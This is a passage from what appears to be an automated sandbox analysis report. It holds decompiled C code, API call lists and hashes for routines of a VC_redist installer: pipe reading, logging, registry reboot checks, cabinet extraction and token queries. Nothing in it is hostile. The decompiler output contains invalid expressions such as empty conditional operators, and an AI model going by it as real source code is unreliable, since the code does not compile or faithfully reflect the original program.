								} else {
									goto L6;
								}
							}
						} else {
							_t49 = 0;
							goto L6;
						}
					}
					if(_t48[2] == 0 && _t48[3] != 0) {
						E000B3999(_t48[3]);
					}
					return _t49;
					L6:
					_t43 = _t43 + _v8;
				} while (_t43 < 8);
				_t31 = _v12;
				_t44 = _v16;
				goto L8;
			}
















                                                                          0x000c4742
                                                                          0x000c4744
                                                                          0x000c4747
                                                                          0x000c474a
                                                                          0x000c474d
                                                                          0x000c4750
                                                                          0x000c4750
                                                                          0x000c4755
                                                                          0x000c4758
                                                                          0x000c4765
                                                                          0x000c476b
                                                                          0x000c4770
                                                                          0x00000000
                                                                          0x000c4772
                                                                          0x000c4772
                                                                          0x000c477d
                                                                          0x000c4786
                                                                          0x000c47ff
                                                                          0x000c4801
                                                                          0x000c4805
                                                                          0x000c4808
                                                                          0x000c480b
                                                                          0x000c47a8
                                                                          0x000c47a8
                                                                          0x000c47aa
                                                                          0x000c47af
                                                                          0x000c47b8
                                                                          0x000c47bd
                                                                          0x000c47c2
                                                                          0x000c481b
                                                                          0x000c4823
                                                                          0x000c485a
                                                                          0x000c4825
                                                                          0x000c4836
                                                                          0x000c4840
                                                                          0x000c484e
                                                                          0x000c4853
                                                                          0x00000000
                                                                          0x000c4853
                                                                          0x000c47c4
                                                                          0x000c47c4
                                                                          0x000c47d4
                                                                          0x000c47d9
                                                                          0x00000000
                                                                          0x000c47d9
                                                                          0x000c47c2
                                                                          0x000c4788
                                                                          0x000c4793
                                                                          0x000c4798
                                                                          0x000c47eb
                                                                          0x000c47f0
                                                                          0x000c47f5
                                                                          0x000c47f5
                                                                          0x000c47f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c4798
                                                                          0x000c477f
                                                                          0x000c477f
                                                                          0x00000000
                                                                          0x000c477f
                                                                          0x000c477d
                                                                          0x000c4865
                                                                          0x000c4870
                                                                          0x000c4870
                                                                          0x000c487d
                                                                          0x000c479a
                                                                          0x000c479a
                                                                          0x000c479d
                                                                          0x000c47a2
                                                                          0x000c47a5
                                                                          0x00000000

                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000008,?,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000001,00000000), ref: 000C4765
                                                                          • GetLastError.KERNEL32 ref: 000C4772
                                                                          • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,00000000), ref: 000C481B
                                                                          • GetLastError.KERNEL32 ref: 000C4825
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                          • API String ID: 1948546556-3410827865
                                                                          • Opcode ID: 95cf572f5c27c510cf53556319679dbbd0963792086e4b6869ad537b4ee3cb4d
                                                                          • Instruction ID: 2c93a33330cb5ca82fb3c9c27235c06e0f008edd9d1dc9f541780eb40a05ea77
                                                                          • Opcode Fuzzy Hash: 95cf572f5c27c510cf53556319679dbbd0963792086e4b6869ad537b4ee3cb4d
                                                                          • Instruction Fuzzy Hash: AD31E971A44225BBE7209F65DC55FAEB7A8FF05711F108229F804E6581EB74DE048BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C67B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E000C67B0(void* __ecx, void* _a4) {
				long _v8;
				int _t12;

				_v8 = _v8 & 0x00000000;
				if(WaitForSingleObject(_a4, 0xffffffff) == 0) {
					_t12 = GetExitCodeThread(_a4,  &_v8); // executed
					if(_t12 == 0) {
						_t24 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						_t25 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "core.cpp", 0x630, _t25);
						_push("Failed to get cache thread exit code.");
						goto L4;
					}
				} else {
					_t30 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					_t31 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "core.cpp", 0x62b, _t31);
					_push("Failed to wait for cache thread to terminate.");
					L4:
					_push(_v8);
					E000F012F();
				}
				return _v8;
			}





                                                                          0x000c67b4
                                                                          0x000c67c5
                                                                          0x000c6806
                                                                          0x000c680e
                                                                          0x000c6821
                                                                          0x000c682b
                                                                          0x000c6839
                                                                          0x000c683c
                                                                          0x000c6841
                                                                          0x00000000
                                                                          0x000c6841
                                                                          0x000c67c7
                                                                          0x000c67d8
                                                                          0x000c67e2
                                                                          0x000c67f0
                                                                          0x000c67f3
                                                                          0x000c67f8
                                                                          0x000c6846
                                                                          0x000c6846
                                                                          0x000c6849
                                                                          0x000c684f
                                                                          0x000c6856

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C67BD
                                                                          • GetLastError.KERNEL32(?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C67C7
                                                                          • GetExitCodeThread.KERNELBASE(00000001,00000000,?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C6806
                                                                          • GetLastError.KERNEL32(?,000C6CFB,000B4740,?,00000000,?,00000000,00000001), ref: 000C6810
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                          • API String ID: 3686190907-3423812259
                                                                          • Opcode ID: ae488efbb72d07d438dba61b08c3d02ef245eda4ec7706d5fe46525488a1e5cb
                                                                          • Instruction ID: 3ac1a7afe8c792feef6d8bcfcd80edce5812e030f2c3aea3f1281efa2825f1f6
                                                                          • Opcode Fuzzy Hash: ae488efbb72d07d438dba61b08c3d02ef245eda4ec7706d5fe46525488a1e5cb
                                                                          • Instruction Fuzzy Hash: E50180B0344304BBFB18ABA5DD56BBE76E5EF00710F20412DB946D55E0EB79DE00AA28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F041B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 87%
                                                                          			E000F041B(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				void* __ebx;
				void* __esi;
				intOrPtr* _t17;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t36;
				void* _t41;
				void* _t42;
				void* _t44;

				_t42 = __edi;
				_t41 = __edx;
				_t40 = __ecx;
				_push(__ecx);
				_v8 = 0;
				EnterCriticalSection(0x11b60c);
				_t17 = _a16;
				if(_t17 == 0 ||  *_t17 == 0) {
					_t44 = E000B2D79(_t40, _a4, _a8, 0x11b604);
					if(_t44 < 0) {
						goto L21;
					}
					_t44 = E000B3446(_t40,  *0x11b604,  &_v8);
					if(_t44 < 0) {
						goto L21;
					}
					_t44 = E000B4013(_v8, 0);
					if(_t44 < 0) {
						goto L21;
					}
					_push(0);
					_push(0x80);
					_t24 = 2;
					_t40 = 4;
					_t25 =  !=  ? _t40 : _t24;
					_t26 = CreateFileW( *0x11b604, 0x40000000, 1, 0,  !=  ? _t40 : _t24, ??, ??);
					 *0x11a774 = _t26;
					if(_t26 != 0xffffffff) {
						L11:
						if(_a20 != 0) {
							SetFilePointer(_t26, 0, 0, 2);
						}
						goto L13;
					}
					_t44 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
					if(_t44 >= 0) {
						_t26 =  *0x11a774; // 0xffffffff
						goto L11;
					}
					E000B37D3(_t34, "logutil.cpp", 0x81, _t44);
					goto L21;
				} else {
					_t36 = E000B2DE0(_t40, _a4, _a8, _a12, _t17, 0x11b604, 0x11a774); // executed
					_t44 = _t36;
					if(_t44 < 0) {
						L21:
						LeaveCriticalSection(0x11b60c);
						if(_v8 != 0) {
							E000F54EF(_v8);
						}
						return _t44;
					} else {
						L13:
						if(_a24 != 0) {
							E000F01F0(0, _t41, _t42, _t44);
						}
						_t27 =  *0x11b608; // 0x0
						if(_t27 != 0) {
							E000F0658(_t40, _t41, _t27);
							_t30 =  *0x11b608; // 0x0
							if(_t30 != 0) {
								E000F54EF(_t30);
								 *0x11b608 = 0;
							}
						}
						if(_a28 == 0) {
							L20:
							 *0x11b634 = 0;
							goto L21;
						} else {
							_t44 = E000B21A5(_a28,  *0x11b604, 0);
							if(_t44 < 0) {
								goto L21;
							}
							goto L20;
						}
					}
				}
			}















                                                                          0x000f041b
                                                                          0x000f041b
                                                                          0x000f041b
                                                                          0x000f041e
                                                                          0x000f0428
                                                                          0x000f042b
                                                                          0x000f0431
                                                                          0x000f0436
                                                                          0x000f0475
                                                                          0x000f0479
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f048e
                                                                          0x000f0492
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f04a1
                                                                          0x000f04a5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f04ae
                                                                          0x000f04af
                                                                          0x000f04b6
                                                                          0x000f04b9
                                                                          0x000f04ba
                                                                          0x000f04cc
                                                                          0x000f04d2
                                                                          0x000f04da
                                                                          0x000f050b
                                                                          0x000f050e
                                                                          0x000f0515
                                                                          0x000f0515
                                                                          0x00000000
                                                                          0x000f050e
                                                                          0x000f04ed
                                                                          0x000f04f2
                                                                          0x000f0506
                                                                          0x00000000
                                                                          0x000f0506
                                                                          0x000f04ff
                                                                          0x00000000
                                                                          0x000f043d
                                                                          0x000f0451
                                                                          0x000f0456
                                                                          0x000f045a
                                                                          0x000f0569
                                                                          0x000f056e
                                                                          0x000f0577
                                                                          0x000f057c
                                                                          0x000f057c
                                                                          0x000f0588
                                                                          0x000f0460
                                                                          0x000f051b
                                                                          0x000f051e
                                                                          0x000f0520
                                                                          0x000f0520
                                                                          0x000f0525
                                                                          0x000f052c
                                                                          0x000f052f
                                                                          0x000f0534
                                                                          0x000f053b
                                                                          0x000f053e
                                                                          0x000f0543
                                                                          0x000f0543
                                                                          0x000f053b
                                                                          0x000f054c
                                                                          0x000f0563
                                                                          0x000f0563
                                                                          0x00000000
                                                                          0x000f054e
                                                                          0x000f055d
                                                                          0x000f0561
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f0561
                                                                          0x000f054c
                                                                          0x000f045a

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0011B60C,00000000,?,?,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F042B
                                                                          • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,0011B604,?,000B5407,00000000,Setup), ref: 000F04CC
                                                                          • GetLastError.KERNEL32(?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F04DC
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F0515
                                                                            • Part of subcall function 000B2DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 000B2F1F
                                                                          • LeaveCriticalSection.KERNEL32(0011B60C,?,?,0011B604,?,000B5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000F056E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 4111229724-637279948
                                                                          • Opcode ID: 4805e9063811539942664bb67bf2a42e35e9f91f1f9b4dcbc150cbd30e8864dd
                                                                          • Instruction ID: 14439887139115af0bf5ecf3f1a7f08edecceda48515f93ad150fd07cd14d110
                                                                          • Opcode Fuzzy Hash: 4805e9063811539942664bb67bf2a42e35e9f91f1f9b4dcbc150cbd30e8864dd
                                                                          • Instruction Fuzzy Hash: 5C31867190561DAFEB219F61DD85AFB3AB8EB10B51F004125FF00A6962D771CD90EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BF69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E000BF69D(intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* _t35;
				void* _t37;
				void* _t46;
				void* _t48;
				void* _t50;
				intOrPtr* _t53;
				void* _t58;
				void* _t65;
				void* _t66;

				_t61 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				if(E000B1F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_a4 + 0x50))) >= 0) {
					_t35 = E000F0E3F( *((intOrPtr*)(_t61 + 0x4c)), _v16, 1,  &_v12); // executed
					if(_t35 < 0) {
						_t37 = E000F0E3F( *((intOrPtr*)(_t61 + 0x4c)),  *((intOrPtr*)(_t61 + 0x50)), 1,  &_v8); // executed
						_t65 = _t37;
						if(_t65 == 0x80070002 || _t65 == 0x80070003) {
							 *_a8 = 0;
							goto L23;
						} else {
							if(_t65 >= 0) {
								_t66 = E000F0EEC(_t58, _v8, L"Resume",  &_v20);
								if(_t66 != 0x80070002) {
									if(_t66 >= 0) {
										_t46 = _v20 - 1;
										if(_t46 == 0) {
											 *_a8 = 2;
										} else {
											_t48 = _t46 - 1;
											if(_t48 == 0) {
												 *_a8 = 5;
											} else {
												_t50 = _t48 - 1;
												if(_t50 == 0) {
													 *_a8 = 6;
												} else {
													_t53 = _a8;
													if(_t50 == 1) {
														 *_t53 = 4;
													} else {
														 *_t53 = 1;
													}
												}
											}
										}
										goto L24;
									}
									_push("Failed to read Resume value.");
									goto L2;
								}
								 *_a8 = 1;
								goto L23;
							} else {
								_push("Failed to open registration key.");
								goto L2;
							}
						}
					} else {
						 *_a8 = 3;
						L23:
						_t66 = 0;
						goto L24;
					}
				} else {
					_push("Failed to format pending restart registry key to read.");
					L2:
					_push(_t66);
					E000F012F();
					L24:
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = 0;
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					if(_v16 != 0) {
						E000F54EF(_v16);
					}
					return _t66;
				}
			}
















                                                                          0x000bf6a6
                                                                          0x000bf6ae
                                                                          0x000bf6b1
                                                                          0x000bf6b7
                                                                          0x000bf6c0
                                                                          0x000bf6cf
                                                                          0x000bf6ef
                                                                          0x000bf6f6
                                                                          0x000bf712
                                                                          0x000bf717
                                                                          0x000bf720
                                                                          0x000bf7bb
                                                                          0x00000000
                                                                          0x000bf732
                                                                          0x000bf734
                                                                          0x000bf74e
                                                                          0x000bf752
                                                                          0x000bf761
                                                                          0x000bf770
                                                                          0x000bf773
                                                                          0x000bf7b0
                                                                          0x000bf775
                                                                          0x000bf775
                                                                          0x000bf778
                                                                          0x000bf7a5
                                                                          0x000bf77a
                                                                          0x000bf77a
                                                                          0x000bf77d
                                                                          0x000bf79a
                                                                          0x000bf77f
                                                                          0x000bf782
                                                                          0x000bf785
                                                                          0x000bf78f
                                                                          0x000bf787
                                                                          0x000bf787
                                                                          0x000bf787
                                                                          0x000bf785
                                                                          0x000bf77d
                                                                          0x000bf778
                                                                          0x00000000
                                                                          0x000bf773
                                                                          0x000bf763
                                                                          0x00000000
                                                                          0x000bf763
                                                                          0x000bf757
                                                                          0x00000000
                                                                          0x000bf736
                                                                          0x000bf736
                                                                          0x00000000
                                                                          0x000bf736
                                                                          0x000bf734
                                                                          0x000bf6f8
                                                                          0x000bf6fb
                                                                          0x000bf7bd
                                                                          0x000bf7bd
                                                                          0x00000000
                                                                          0x000bf7bd
                                                                          0x000bf6d1
                                                                          0x000bf6d1
                                                                          0x000bf6d6
                                                                          0x000bf6d6
                                                                          0x000bf6d7
                                                                          0x000bf7bf
                                                                          0x000bf7c8
                                                                          0x000bf7cd
                                                                          0x000bf7cf
                                                                          0x000bf7cf
                                                                          0x000bf7d5
                                                                          0x000bf7da
                                                                          0x000bf7dc
                                                                          0x000bf7dc
                                                                          0x000bf7e2
                                                                          0x000bf7e7
                                                                          0x000bf7e7
                                                                          0x000bf7f4
                                                                          0x000bf7f4

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000BF7CD
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000BF7DA
                                                                          Strings
                                                                          • %ls.RebootRequired, xrefs: 000BF6BA
                                                                          • Failed to format pending restart registry key to read., xrefs: 000BF6D1
                                                                          • Failed to open registration key., xrefs: 000BF736
                                                                          • Resume, xrefs: 000BF741
                                                                          • Failed to read Resume value., xrefs: 000BF763
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                          • API String ID: 3535843008-3890505273
                                                                          • Opcode ID: a578cfe2a3eb8f2c6487b5bb0c94a2eb787473bcbeb236994b6aabeeb763585c
                                                                          • Instruction ID: ef1111a5924bdfed0a894e7fb09ac6dd1532d060a300255c7fba94baf8d084f2
                                                                          • Opcode Fuzzy Hash: a578cfe2a3eb8f2c6487b5bb0c94a2eb787473bcbeb236994b6aabeeb763585c
                                                                          • Instruction Fuzzy Hash: BF415F3698411AFFCB119F98CC81AFDBBB5FB05310F2581B6E914AB251CB769E40DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D08F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E000D08F0(void* __ecx, void* _a8, long _a12) {
				long _v8;
				intOrPtr _t25;
				int _t27;
				signed short _t30;
				intOrPtr _t41;
				signed int _t44;
				struct _OVERLAPPED* _t48;
				long _t54;

				_t44 =  *0x11aac0; // 0x0
				_t48 = 0;
				_v8 = 0;
				_t41 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t44 * 4)) + 4));
				_t25 =  *((intOrPtr*)(_t41 + 0x2c));
				if(_t25 == 0) {
					_t27 = WriteFile( *(_t41 + 0x3c), _a8, _a12,  &_v8, 0); // executed
					if(_t27 == 0) {
						_t30 = GetLastError();
						_t52 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x304, _t48);
						_push("Failed to write during cabinet extraction.");
						goto L6;
					}
				} else {
					if(_t25 == 1) {
						_t54 = _a12;
						E000D1664( *((intOrPtr*)(_t41 + 0x40)) +  *((intOrPtr*)(_t41 + 0x48)),  *((intOrPtr*)(_t41 + 0x44)) -  *((intOrPtr*)(_t41 + 0x48)), _a8, _t54);
						 *((intOrPtr*)(_t41 + 0x48)) =  *((intOrPtr*)(_t41 + 0x48)) + _t54;
						_v8 = _t54;
					} else {
						_t48 = 0x8007139f;
						_push("Unexpected call to CabWrite().");
						L6:
						E000F012F();
						_t44 = _t48;
					}
				}
				 *((intOrPtr*)(_t41 + 0x30)) = _t48;
				_t29 =  <  ? _t44 | 0xffffffff : _v8;
				return  <  ? _t44 | 0xffffffff : _v8;
			}











                                                                          0x000d08f4
                                                                          0x000d0902
                                                                          0x000d0907
                                                                          0x000d090a
                                                                          0x000d0914
                                                                          0x000d0917
                                                                          0x000d095f
                                                                          0x000d0967
                                                                          0x000d0969
                                                                          0x000d097a
                                                                          0x000d0984
                                                                          0x000d0992
                                                                          0x000d0997
                                                                          0x00000000
                                                                          0x000d0997
                                                                          0x000d0919
                                                                          0x000d091c
                                                                          0x000d0931
                                                                          0x000d0940
                                                                          0x000d0948
                                                                          0x000d094b
                                                                          0x000d091e
                                                                          0x000d091e
                                                                          0x000d0923
                                                                          0x000d099c
                                                                          0x000d099d
                                                                          0x000d09a3
                                                                          0x000d09a3
                                                                          0x000d091c
                                                                          0x000d09a4
                                                                          0x000d09b0
                                                                          0x000d09b7

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                          • String ID: @Met$Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                          • API String ID: 1970631241-130182655
                                                                          • Opcode ID: 35b11b2d58e52ca9caa6c319677e73224427dbd1b2a790f6b8d1710b24b48eef
                                                                          • Instruction ID: f380091bd6ce0ded971626f8ae0ba81aa1a10d84575ccf414a4a61e978ba9bb2
                                                                          • Opcode Fuzzy Hash: 35b11b2d58e52ca9caa6c319677e73224427dbd1b2a790f6b8d1710b24b48eef
                                                                          • Instruction Fuzzy Hash: 84218B76640304AFEB14DF6DDD84EAA77E9FF88720F11405AFA08C7256D771DA009B61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F076C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E000F076C(void* _a4, signed int* _a8) {
				void* _v8;
				void _v12;
				long _v16;
				int _t20;
				signed short _t27;
				long _t31;

				_t31 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_t20 = GetTokenInformation(_v8, 0x14,  &_v12, 4,  &_v16); // executed
					if(_t20 == 0) {
						_t31 =  <=  ? GetLastError() : 0x80004005 & 0x0000ffff | 0x80070000;
						if(_t31 != 0x80070057) {
							if(_t31 < 0) {
								_push(_t31);
								_push(0x35);
								goto L8;
							}
						} else {
							_t31 = 0;
							 *_a8 = 0;
						}
					} else {
						 *_a8 = 0 | _v12 != 0x00000000;
					}
				} else {
					_t27 = GetLastError();
					_t36 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_t31 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_push(_t31);
					_push(0x21);
					L8:
					_push("procutil.cpp");
					E000B37D3(0x80004005);
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _t31;
			}









                                                                          0x000f077f
                                                                          0x000f0781
                                                                          0x000f0784
                                                                          0x000f0787
                                                                          0x000f0792
                                                                          0x000f07c6
                                                                          0x000f07ce
                                                                          0x000f07f0
                                                                          0x000f07f9
                                                                          0x000f0806
                                                                          0x000f0808
                                                                          0x000f0809
                                                                          0x00000000
                                                                          0x000f0809
                                                                          0x000f07fb
                                                                          0x000f07fe
                                                                          0x000f0800
                                                                          0x000f0800
                                                                          0x000f07d0
                                                                          0x000f07db
                                                                          0x000f07db
                                                                          0x000f0794
                                                                          0x000f0794
                                                                          0x000f07a5
                                                                          0x000f07af
                                                                          0x000f07b2
                                                                          0x000f07b3
                                                                          0x000f080b
                                                                          0x000f080b
                                                                          0x000f0810
                                                                          0x000f0810
                                                                          0x000f0818
                                                                          0x000f081d
                                                                          0x000f081d
                                                                          0x000f082a

                                                                          APIs
                                                                          • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,000C8110,00000000), ref: 000F078A
                                                                          • GetLastError.KERNEL32(?,?,?,?,000C8110,00000000), ref: 000F0794
                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,000C8110,00000000), ref: 000F07C6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,000C8110,00000000), ref: 000F081D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Token$ChangeCloseErrorFindInformationLastNotificationOpenProcess
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 2387526074-2144224329
                                                                          • Opcode ID: 566901e73a3ca9d561a6e3c8d0d7034b188f966ff1f5f15c92f9ee4f0ea7505a
                                                                          • Instruction ID: 955352e3a433470b59c6299c213d9f91f47a5c3e25499c483809c83b98d11f02
                                                                          • Opcode Fuzzy Hash: 566901e73a3ca9d561a6e3c8d0d7034b188f966ff1f5f15c92f9ee4f0ea7505a
                                                                          • Instruction Fuzzy Hash: C421C671E40228EBEB20AB95CC44AFEBBE8EF44750F114066EE15E7560DB308E01EBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CD206 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 22%
                                                                          			E000CD206(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
